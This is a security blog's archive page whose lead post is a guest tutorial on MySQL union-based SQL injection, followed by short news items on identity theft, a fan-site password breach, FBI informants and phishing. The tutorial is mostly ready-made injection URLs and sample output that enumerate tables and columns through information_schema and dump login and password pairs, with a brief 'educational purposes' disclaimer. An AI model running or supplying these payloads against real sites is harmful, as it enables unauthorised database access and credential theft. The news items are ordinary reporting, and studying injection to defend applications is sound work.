Showing posts sorted by date for query ID fraud. Sort by relevance Show all posts
Showing posts sorted by date for query ID fraud. Sort by relevance Show all posts

We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)

Posted by Avik Sarkar On 12/02/2013 01:00:00 am

We Are The Best Tool For Web Application Security (Discovering The Infamous Sql-injection Technique) 

Today I am proudly sharing an article made by Mr. Rafael Souza one of the great admirer and fan of VOGH has gladly shared his brilliant research paper on SQL-Injection (MySql) with us. Rafael is a very passionate on cyber security domain and he is keenly involved with GreyHat Community and Maintainer design of Brazilian Backtrack Team. So without wasting time lets go and see what Rafael has for us:- 

Discover The Infamous MySQL Injection Technique 
                                                                                        
ABSTRACT:
It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity. Did you know that numerous inventions and discoveries are due to misconceptions?
There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pos software for analysis and farredura vulnerabilities were unimproved by us.
                                                                                                       
Understand the technique MySQL Injection: 
One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application. 

STEP BY STEP
 
(Figure 1) Detecting
Searching Column number (s): We will test earlier in error, then no error may be said to find.
(Figure 2) SQL Error 
Host Information,
Version of MySQL system used on the server.
(Figure 3) Host Information
(Figure 4) Location of the Files
Current database connection used between the "input" to the MySQL system
(Figure 5) Users of MySQL
(Figure 6) Current Time
Brute Force or Shooting
This happens in versions below 5.x.y
(Figure 7) Testing

Dump: This happens in versions up 5.x.y [ 1º Method ]
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--
usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--
CHARACTER_SETS
or
Unknown column 'CHARACTER_SETS' in 'where clause'
ou
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--
COLLATIONS
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--
usuarios
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--
rafael
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Searching Column (s) of a given table
* Brute Force / Shooting
This happens in versions below 5.x.y
http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--
_Rafa_
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--
rafael1337
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1

=--------------------------=--------------------------=--------------------------=--------------------------=
Dump
This happens in versions up 5.x.y [ 1º Method ]

"usuarios" hexadecimal -> "7573756172696f73"

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--
login,passwd,id,texto
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

"usuarios" decimal -> "117,115,117,97,114,105,111,115"

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--
login
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--
passwd
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--
id
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--
texto
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Extracting data from the columns of a given table
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios--
_RHA_ : infosec1337
or
Unknown column '_RHA_ : infosec1337‘ in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1

=--------------------------=
Concat
group_concat() => Search all you want with ascii caracters
concat() => search what you want with ascii caracters
concat_ws() => unite

Hexadecimal
0x3a => :
0x20 => space
0x2d => -
0x2b => +

Readers, this article is for educational purposes only, could continue explaining how to exploit web sites, but that is not my intention.
It is known that the impact of the change may provide unauthorized access to a restricted area, being imperceptible to the eye of an inexperienced developer, it may also allow the deletion of a table, compromising the entire application, among other features. So I want to emphasize that this paper is for security researcher and developers to beware and test your code.

CONCLUSION
Many companies are providing important information on its website and database, information is the most valuable asset is intangible, the question is how developers are dealing with this huge responsibility?
The challenge is to develop increasingly innovative sites, coupled with mechanisms that will provide security to users.
The purpose of this paper is to present what is SQL Injection, how applications are explored and techniques for testing by allowing the developer to customize a system more robust and understand the vulnerability.
**********
I hope you all will enjoy the above article, as I did. On behalf of entire VOGH Team I am sincerely thanking Mr. Rafael Souza for his remarkable contribution. 
To get more of such exclusive research papers along with all kind of breaking cyber updates across the globe just stay tuned with VOGH


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Edward Pearson Sent To Jail For Stealing 8Million Customers Banking & PayPal Details

Posted by Avik Sarkar On 4/04/2012 02:28:00 pm

Edward Pearson (23 Years Aged Hacker) Sent To Jail For Stealing 8Million Customers Banking & PayPal Details

A 23 years aged hacker from UK named Edward Pearson has been sent to prison to pilfer eight million personal identities (ID fraud). Between January 1 2010 and August 30 2011, he used of malicious computer programs to get his hands on - wait for it - eight MILLION personal identities. According to report he used highly sophisticated cyber-weapons such as Zeus and SpyEye, to hunt down personal details on the Internet. 
One of his programs scanned through 200,000 accounts registered to online payment service PayPal - identifying names, passwords and current balances. Luckily, Pearson got caught after only making a £2,400 ($3,800 USD). The authorities estimate he could have walked away with as much as £800,000 ($1.3M USD).  Authorities were alerted to the problem when his 21-year-old girlfriend, Cassandra Mennim, used stolen credit cards to book rooms at the upmarket Cedar Court Grand and Lady Anne Middleton Hotels. Investigators looking into the case eventually identified him as G-Zero on hacking forms. Pearson has been jailed for 26 months, whilst girlfriend Cassandra Mennim admitted two counts of obtaining services dishonestly and was given 12 months’ supervision.


-Source (NS & DailyMail)


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Philippine Becomes Haven for Organized Cybercrime (Pornography, Cyber Sex Dens, Online Gambling, CC Fraud and Id theft)

Posted by Avik Sarkar On 10/23/2011 05:16:00 pm

A top Philippine National Police official said the country has become a “haven” for transnational organized crime syndicates involved in cyber pornography, cyber sex dens, illegal online gambling, credit card fraud and identity theft due to weak laws against cyber crimes and the poor technical know-how of law enforcers.
Chief Superintendent Samuel Pagdilao Jr., director of the PNP Criminal Investigation and Detection Group (CIDG), said cyber-crime mafias, mostly foreigners, have established their base of operations in the Philippines. Pagdilao said cyber-crime operators have taken advantage of the PNP’s “organizational and technical incapability” to fight cyber crimes.
While cyber-crime syndicates use sophisticated technology, he rued that “law enforcers in the country are lagging behind in terms of training and equipment.”
Pagdilao asked Congress to prioritize passing the proposed cyber-crime prevention law to address the country’s legal inadequacies. He also asked the PNP to support the organizational and technical capability build-up of the CIDG’s cyber-crime unit. Pagdilao said foreign mafias have been running cyber-sex dens and cyber-pornography operations in the country. He said Korean mafias have been behind illegal online gambling and credit card fraud operations in the country.
Pagdilao said their recent arrest here of a Korean hacker wanted by Interpol revealed that “Korean cyber-crime syndicates are operating almost unhampered” in the country.

For More Information Click Here


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Star Wars Galaxies Fan Site Hacked (21,000 Email-id & 23,000 Passwords Stolen)

Posted by Avik Sarkar On 9/01/2011 05:02:00 pm


A Star Wars Galaxies fan site got hacked today and thieves stole 21,000 email addresses and 23,000 passwords. And judging from an analysis of the passwords, most of them were weak. The site SWGalaxies.net is a fan site owned by LFNetwork, an independently owned network of LucasArts fan sites. Hackers from the group ObSec, a small hacking collective with apparent sympathies for the LulzSec and AntiSec hacktivist groups, broke into the site’s security and posted the addresses and passwords on the web. While a compromised forum login isn’t itself a big deal, the threat from this kind of smaller breach is that it can lead to further identity theft that could be devastating for individuals — particularly if they’re reusing the same passwords at other, more critical websites.
Jeff Moeller, editor of LFNetwork, said that the site that got hacked is not actively maintained any more. The fan site targets males 18 to 34 years old, and evidently none of the other UGO or IGN sites were targeted.

According to the identifier Report:-

“It’s unfortunate,” said Todd Feinman, chief executive of Identity Finder, in an interview. “It must be so frustrating for someone to see their passwords online, given the amount of online sign-ups we have to do.”

Of the 23,389 passwords stolen, 71 percent were weak. Only 13 percent of the passwords were strong. The average password length was 7.6 characters. About 4.3 percent of the passwords were less than 5 characters, and only 4.7 percent of the passwords were more than 10 characters long.
Hacking a game web site password isn’t too big a deal. But the problem is that users often reuse their passwords on more important sites, like online banks. Studies show that 50 percent of passwords are reused.
Feinman said, “Passwords are a digital identity and password reuse is a serious problem that could lead toward identity fraud.”
One of the users had a password that was 42 characters long. That person took trouble to protect himself or herself. But since the web site stored the passwords in an unencrypted format, the password is out there for everyone to see now.

-News Source (Games Beat & Star Galaxy)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Out of four one online criminal are the informer of FBI

Posted by Avik Sarkar On 6/07/2011 07:34:00 pm


One in four computer hackers is secretly working for the FBI and U.S. secret service to inform on their peers, it has been claimed. By threatening long prison sentences, officers have managed successfully to infiltrate communities of the online criminals, recruiting a huge number of informants.
The moles, who are already embedded deep inside the hacking community, are then reporting back to the FBI about large-scale identity fraud in an attempt to earn themselves softer sentences. Some major illegal forums where hackers sell stolen credit card details and forged identities are even being run by the FBI moles, it has been claimed. The management of other sites have been taken over by FBI agents posing as ID theft specialists, or 'carders', where they can use the intelligence to land genuine hackers with lengthy jail sentences. It is thought their work has already managed to put dozens of online criminals in jail - leaving the underground hacking world riddled with paranoia about infiltration. Eric Corley, who publishes 2600, the hacker quarterly, told the Guardian that as many as a quarter of all hackers in the U.S. may have been recruited by authorities as moles. 'Owing to the harsh penalties involved and the relative inexperience with the law that many hackers have, they are rather susceptible to intimidation, he said.
John Young, who runs Cryptome, a website similar to WikiLeaks that attempts to publish secret documents, added: 'It makes for very tense relationships. There are dozens and dozens of hackers who have been shopped by people they thought they trusted.' Among many convictions is the extremely high-profile case of Bradley Manning, who is being held on suspicion of passing on documents to WikiLeaks.
He was shopped to authorities by Adrian Lamo, a convicted hacker turned informant.
Lamo, who is viewed in online communities as a 'Judas' and has been called 'the world's most hated hacker', has said: 'Obviously it's been much worse for him but it's certainly been no picnic for me. He followed his conscience, and I followed mine.
Barrett Brown, a spokesman for the 'hacktivist' group Anonymous, told the Guardian: 'The FBI are always there. They are always watching, always in the chatrooms. You don't know who is an informant and who isn't, and to that extent you are vulnerable.'
Kevin Poulsen, senior editor at Wired magazine, added: 'We have already begun to see Anonymous members attack each other and out each other's IP addresses.
'That's the first step towards being susceptible to the FBI.'

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Phishing: E-Mail Needs Authentication

Posted by Avik Sarkar On 4/25/2011 11:06:00 pm

In the wake of the Epsilon breach, organizations have taken the lead to notify consumers, telling them their e-mail addresses have been exposed and linked to information that could subject them to phishing attacks.
The breach highlights the increasing sensitivity of e-mail. "E-mail addresses have been vulnerable since e-mail addresses were created," says Rohrbaugh, vice president of information security for Intersections Inc.
Rohrbaugh says phishing attacks are increasing and provide the best means for fraudsters to get their hands on consumers' identities -- which inevitably leads to fraud. "Social engineering is a very successful tool for the criminal," he says. "Phishing is more sophisticated." It's come a long way since the early days of "shotgun" phishing. Today's attacks are targeted.
In this interview [transcript below], Rohrbaugh discusses:
  • Online security;
  • Consumer responsibility for online safety and the protection of personal information;
  • E-mail server authentication.
Rohrbaugh is a technologist with more than 20 years of government and private sector experience. Rohrbaugh's security career started in the military and continued under government projects for CSC at NATO, DISA, NMRC as an architect; and ST&E team lead and instructor for information security. After entering the private world and working for Metamor WW, Rohrbaugh started an e-business consulting firm that served the U.S. and Europe. Rohrbaugh then brought his information security experience to the financial sector and joined Intersections, which provides identity theft solutions to financial institutions in North America. Rohrbaugh's main focus is anti-fraud, ID verification (U.S. Patent holder) and security architecture.

Phishing: Social Engineering

TRACY KITTEN: Phishing attack concerns have been heighted by the Epsilon e-mail breach, which is believed to have exposed countless consumer e-mail addresses affiliated with loyalty programs and marketing campaigns. How vulnerable are we to phishing and subsequently ID theft when fraudsters have access to e-mail addresses and affiliations that link those addresses to other information? I'm here today with Tim Rohrbaugh, vice president of Information Security for Intersections Inc. which provides the recovery service for the Identity Theft Assistance Center. Tim, can you give our audience just a general idea about the state of phishing generally?
TIM ROHRBAUGH: Phishing is simply a form of social engineering. Humans have been manipulating other humans for the purposes of gaining confidential information since we first started to communicate. The job of social engineering today is made a little bit easier, because of a lot of our evolved defenses are rendered useless. You can look at a person and make a characterization about whether they are a male or a female if they're in front of you, or maybe you know if they look confident or desperate, and those things are not available to you when you're dealing with e-mail. So, now we have to respond to an e-mail or a text and react in the same way if facing somebody in person. With e-mail, as a communication medium, all we have to look for is a sender's name. The links, which can be covertly hidden within the mail message itself, have to be recognized as legitimate or not -- whether they are leading off some place that you didn't suspect. The other thing to look for is the e-mail time link. Is it in context? Did we just recently read from our financial institution or local government that they would never send an e-mail asking for this information. These are all things that we're trying to evaluate when the e-mail comes in and determine what we're going to do. Today there is still not a good indication that the e-mail is from a verified source. The mail servers in between are trying to do authentication, but it's not fully implemented around the network. The junk mail filters work part of the time, but phishing attacks have changed a little bit.
KITTEN: How have phishing attacks advanced? And when I talk about the advancement of phishing attacks, I'm talking about beyond just phishing links. What other types of techniques are fraudsters using to hijack personal information?

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...

Site search